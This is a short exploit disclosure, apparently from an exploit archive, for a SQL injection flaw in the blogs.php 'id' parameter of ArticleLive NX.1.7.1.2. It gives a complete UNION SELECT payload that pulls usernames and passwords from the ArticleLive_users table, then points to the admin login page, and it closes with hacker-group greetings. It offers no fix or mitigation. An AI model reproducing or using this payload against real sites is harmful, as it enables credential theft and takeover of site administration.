ArticleLive (blogs.php?Id) SQL Injection Vulnerability :

Date : 2010-01-01 Author : Baybora
*******************************************************************************
# Author   : Baybora
# Product  : ArticleLive (Interspire Website Publisher)
# Version  : NX.1.7.1.2 (and possibly earlier versions)
# Download : http://www.interspire.com/
# Price    : $ 249
# Site     : www.1923turk.biz

 
Vulnerable script: blogs.php?Id = (SQL-injection)

---------------------------------------------------------


http://server/[path]//blogs.php?id=  [SQL Inject]


blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--


Admin Login->


http://server/[path]/admin/


"""""""""""""""""""""

Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO

C1

 

C2

 

C3